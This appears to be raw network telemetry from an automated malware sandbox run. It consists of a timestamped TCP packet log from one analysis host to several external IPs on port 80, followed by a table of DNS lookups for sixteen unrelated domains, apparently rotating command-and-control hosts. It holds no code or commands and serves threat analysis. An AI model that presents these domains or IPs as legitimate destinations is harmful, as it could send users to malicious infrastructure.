                                                                                  Nov 13, 2024 15:35:08.537962914 CET4999680192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:08.537962914 CET4999680192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:08.649821997 CET8049996203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:08.649840117 CET8049996203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:08.649852991 CET8049996203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:08.649950981 CET4999680192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:09.373334885 CET4999680192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:10.396116018 CET4999780192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:10.400927067 CET8049997203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:10.401720047 CET4999780192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:10.414585114 CET4999780192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:10.419435978 CET8049997203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:10.419531107 CET8049997203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:11.091475964 CET8049997203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:11.091500044 CET8049997203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:11.091510057 CET8049997203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:11.091521025 CET8049997203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:11.091547012 CET8049997203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:11.091557026 CET8049997203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:11.091566086 CET8049997203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:11.091577053 CET8049997203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:11.091578007 CET4999780192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:11.091586113 CET8049997203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:11.091599941 CET8049997203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:11.091654062 CET4999780192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:11.091654062 CET4999780192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:11.091675043 CET4999780192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:11.096548080 CET8049997203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:11.096560001 CET8049997203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:11.096570015 CET8049997203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:11.096595049 CET8049997203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:11.096625090 CET4999780192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:11.096687078 CET4999780192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:11.211548090 CET8049997203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:11.211565971 CET8049997203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:11.211577892 CET8049997203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:11.211704016 CET4999780192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:11.211796999 CET4999780192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:11.920308113 CET4999780192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:12.938575029 CET4999880192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:13.917273998 CET8049998203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:13.917341948 CET4999880192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:13.930963039 CET4999880192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:13.937143087 CET8049998203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:14.616981030 CET8049998203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:14.617002010 CET8049998203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:14.617014885 CET8049998203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:14.617027998 CET8049998203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:14.617038965 CET8049998203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:14.617049932 CET8049998203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:14.617206097 CET4999880192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:14.617206097 CET4999880192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:14.618045092 CET8049998203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:14.618057013 CET8049998203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:14.618102074 CET8049998203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:14.618113041 CET8049998203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:14.618133068 CET4999880192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:14.621891022 CET4999880192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:14.622242928 CET8049998203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:14.622255087 CET8049998203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:14.622266054 CET8049998203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:14.622489929 CET4999880192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:14.622644901 CET8049998203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:14.627367973 CET4999880192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:14.736484051 CET8049998203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:14.736593008 CET8049998203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:14.736605883 CET8049998203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:14.736784935 CET4999880192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:14.740169048 CET4999880192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:14.745127916 CET8049998203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:20.229022026 CET4999980192.168.2.568.66.226.92
                                                                                  Nov 13, 2024 15:35:20.234719038 CET804999968.66.226.92192.168.2.5
                                                                                  Nov 13, 2024 15:35:20.234797955 CET4999980192.168.2.568.66.226.92
                                                                                  Nov 13, 2024 15:35:20.253917933 CET4999980192.168.2.568.66.226.92
                                                                                  Nov 13, 2024 15:35:20.259324074 CET804999968.66.226.92192.168.2.5
                                                                                  Nov 13, 2024 15:35:20.874661922 CET804999968.66.226.92192.168.2.5
                                                                                  Nov 13, 2024 15:35:20.895230055 CET804999968.66.226.92192.168.2.5
                                                                                  Nov 13, 2024 15:35:20.895373106 CET4999980192.168.2.568.66.226.92
                                                                                  Nov 13, 2024 15:35:21.764144897 CET4999980192.168.2.568.66.226.92
                                                                                  Nov 13, 2024 15:35:22.782572031 CET5000080192.168.2.568.66.226.92
                                                                                  Nov 13, 2024 15:35:22.787727118 CET805000068.66.226.92192.168.2.5
                                                                                  Nov 13, 2024 15:35:22.791383028 CET5000080192.168.2.568.66.226.92
                                                                                  Nov 13, 2024 15:35:22.807187080 CET5000080192.168.2.568.66.226.92
                                                                                  Nov 13, 2024 15:35:22.812150002 CET805000068.66.226.92192.168.2.5
                                                                                  Nov 13, 2024 15:35:23.457957029 CET805000068.66.226.92192.168.2.5
                                                                                  Nov 13, 2024 15:35:23.479116917 CET805000068.66.226.92192.168.2.5
                                                                                  Nov 13, 2024 15:35:23.479306936 CET5000080192.168.2.568.66.226.92
                                                                                  Nov 13, 2024 15:35:24.310957909 CET5000080192.168.2.568.66.226.92
                                                                                  Nov 13, 2024 15:35:25.329171896 CET5000180192.168.2.568.66.226.92
                                                                                  Nov 13, 2024 15:35:25.334297895 CET805000168.66.226.92192.168.2.5
                                                                                  Nov 13, 2024 15:35:25.335133076 CET5000180192.168.2.568.66.226.92
                                                                                  Nov 13, 2024 15:35:25.348265886 CET5000180192.168.2.568.66.226.92
                                                                                  Nov 13, 2024 15:35:25.353616953 CET805000168.66.226.92192.168.2.5
                                                                                  Nov 13, 2024 15:35:25.353754997 CET805000168.66.226.92192.168.2.5
                                                                                  Nov 13, 2024 15:35:25.979759932 CET805000168.66.226.92192.168.2.5
                                                                                  Nov 13, 2024 15:35:26.000932932 CET805000168.66.226.92192.168.2.5
                                                                                  Nov 13, 2024 15:35:26.001141071 CET5000180192.168.2.568.66.226.92
                                                                                  Nov 13, 2024 15:35:26.857682943 CET5000180192.168.2.568.66.226.92
                                                                                  Nov 13, 2024 15:35:27.877065897 CET5000280192.168.2.568.66.226.92
                                                                                  Nov 13, 2024 15:35:27.882456064 CET805000268.66.226.92192.168.2.5
                                                                                  Nov 13, 2024 15:35:27.882538080 CET5000280192.168.2.568.66.226.92
                                                                                  Nov 13, 2024 15:35:27.893192053 CET5000280192.168.2.568.66.226.92
                                                                                  Nov 13, 2024 15:35:27.898293018 CET805000268.66.226.92192.168.2.5
                                                                                  Nov 13, 2024 15:35:28.520843983 CET805000268.66.226.92192.168.2.5
                                                                                  Nov 13, 2024 15:35:28.541877985 CET805000268.66.226.92192.168.2.5
                                                                                  Nov 13, 2024 15:35:28.543456078 CET5000280192.168.2.568.66.226.92
                                                                                  Nov 13, 2024 15:35:28.547311068 CET5000280192.168.2.568.66.226.92
                                                                                  Nov 13, 2024 15:35:28.552267075 CET805000268.66.226.92192.168.2.5
                                                                                  Nov 13, 2024 15:36:55.120069981 CET5002380192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:55.984172106 CET5002380192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:57.001513958 CET5002480192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:57.006973982 CET805002476.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:36:57.007102013 CET5002480192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:57.022141933 CET5002480192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:57.027240038 CET805002476.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:36:57.661840916 CET805002476.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:36:57.662497044 CET805002476.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:36:57.662561893 CET5002480192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:58.529654026 CET5002480192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:59.547898054 CET5002580192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:59.612667084 CET805002576.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:36:59.612766981 CET5002580192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:59.629200935 CET5002580192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:59.634073973 CET805002576.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:36:59.634109020 CET805002576.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:37:00.259753942 CET805002576.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:37:00.260663033 CET805002576.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:37:00.260720015 CET5002580192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:37:01.139516115 CET5002580192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:37:02.158263922 CET5002680192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:37:02.163285971 CET805002676.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:37:02.163372993 CET5002680192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:37:02.174792051 CET5002680192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:37:02.180346012 CET805002676.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:37:02.845258951 CET805002676.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:37:02.846175909 CET805002676.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:37:02.851533890 CET5002680192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:37:02.861282110 CET5002680192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:37:02.866877079 CET805002676.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:37:08.934007883 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:08.938855886 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:08.939639091 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:08.955539942 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:08.960561991 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.841588974 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.841615915 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.841628075 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.841661930 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:09.842107058 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.842122078 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.842145920 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:09.842582941 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.842595100 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.842608929 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.842616081 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:09.842642069 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:09.843436956 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.843451023 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.843486071 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:09.847593069 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.847608089 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.847620964 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.847708941 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:09.888973951 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:09.982872009 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.982933044 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.982943058 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.982980967 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:09.983464003 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.983501911 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:09.983642101 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:10.029694080 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:10.125227928 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:10.125287056 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:10.467914104 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:11.487562895 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:11.494469881 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:11.495734930 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:11.509933949 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:11.516709089 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.388792992 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.388915062 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.388927937 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.389384031 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:12.389436007 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.389448881 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.389460087 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.389487982 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:12.389514923 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:12.390438080 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.390451908 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.390464067 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.390475035 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.390502930 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:12.390539885 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:12.395509958 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.395622969 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.395663977 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:12.529741049 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.529822111 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.529835939 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.529865026 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:12.530306101 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.530345917 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:12.530586004 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.530597925 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.530638933 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:12.670380116 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.676276922 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:13.014185905 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:14.033663034 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:14.038968086 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.039051056 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:14.055740118 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:14.063059092 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.064764023 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.922352076 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.922416925 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.922450066 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.922552109 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:14.922668934 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.922703981 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.922734022 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:14.923106909 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.923135042 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.923167944 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.923196077 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:14.923202991 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.923604012 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:14.924058914 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.927604914 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:14.928677082 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.928797007 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.928832054 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.928869963 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:14.983549118 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:15.064382076 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:15.064450979 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:15.064465046 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:15.064662933 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:15.064934015 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:15.064999104 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:15.065077066 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:15.065519094 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:15.067579985 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:15.206516981 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:15.207590103 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:15.563571930 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:16.580874920 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:16.711877108 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:16.714030027 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:16.723383904 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:16.731136084 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.605088949 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.605226040 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.605449915 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.605459929 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.605539083 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.605683088 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:17.605715990 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.605729103 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.605741024 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.605858088 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:17.606314898 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.606544018 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.607608080 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:17.612725973 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.612984896 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.613183975 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.613380909 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:17.613394022 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.615626097 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:17.738226891 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.738429070 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.738444090 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.738482952 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:17.738948107 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.739017010 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:17.739372969 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.739388943 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.739423990 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:17.874104977 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.874219894 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:17.875364065 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:17.880302906 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:22.942091942 CET5003180192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:22.951385975 CET8050031188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:22.951699972 CET5003180192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:22.965634108 CET5003180192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:22.972606897 CET8050031188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:24.060480118 CET8050031188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:24.060596943 CET8050031188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:24.060641050 CET5003180192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:24.061633110 CET8050031188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:24.061676025 CET5003180192.168.2.5188.114.96.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 13, 2024 15:34:05.995486975 CET | 192.168.2.5 | 1.1.1.1 | 0xac8c | Standard query (0) | www.bahaeng.com | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:34:22.126688004 CET | 192.168.2.5 | 1.1.1.1 | 0xcf87 | Standard query (0) | www.atendefacil.info | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:34:36.002886057 CET | 192.168.2.5 | 1.1.1.1 | 0x9802 | Standard query (0) | www.sklad-iq.online | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:34:50.423686028 CET | 192.168.2.5 | 1.1.1.1 | 0x3af6 | Standard query (0) | www.mdpc7.top | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:35:05.259255886 CET | 192.168.2.5 | 1.1.1.1 | 0xe0f3 | Standard query (0) | www.ecojomos.xyz | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:35:19.758178949 CET | 192.168.2.5 | 1.1.1.1 | 0xd3c9 | Standard query (0) | www.717hy.net | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:35:33.549442053 CET | 192.168.2.5 | 1.1.1.1 | 0x36f8 | Standard query (0) | www.mrpokrovskii.pro | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:35:47.456629038 CET | 192.168.2.5 | 1.1.1.1 | 0xbea7 | Standard query (0) | www.7vh2wy.top | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:35:48.467385054 CET | 192.168.2.5 | 1.1.1.1 | 0xbea7 | Standard query (0) | www.7vh2wy.top | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:35:49.472656965 CET | 192.168.2.5 | 1.1.1.1 | 0xbea7 | Standard query (0) | www.7vh2wy.top | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:36:04.175297022 CET | 192.168.2.5 | 1.1.1.1 | 0x2aa0 | Standard query (0) | www.lsfanarolt.shop | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:36:17.752012014 CET | 192.168.2.5 | 1.1.1.1 | 0x36bb | Standard query (0) | www.129glenforest.com | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:36:31.721447945 CET | 192.168.2.5 | 1.1.1.1 | 0x66e3 | Standard query (0) | www.joube.shop | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:36:39.815146923 CET | 192.168.2.5 | 1.1.1.1 | 0x17a2 | Standard query (0) | www.madhf.tech | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:36:54.361058950 CET | 192.168.2.5 | 1.1.1.1 | 0xbf77 | Standard query (0) | www.grandesofertas.fun | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:37:07.877304077 CET | 192.168.2.5 | 1.1.1.1 | 0x6808 | Standard query (0) | www.sankan-fukushi.info | A (IP address) | IN (0x0001) | false
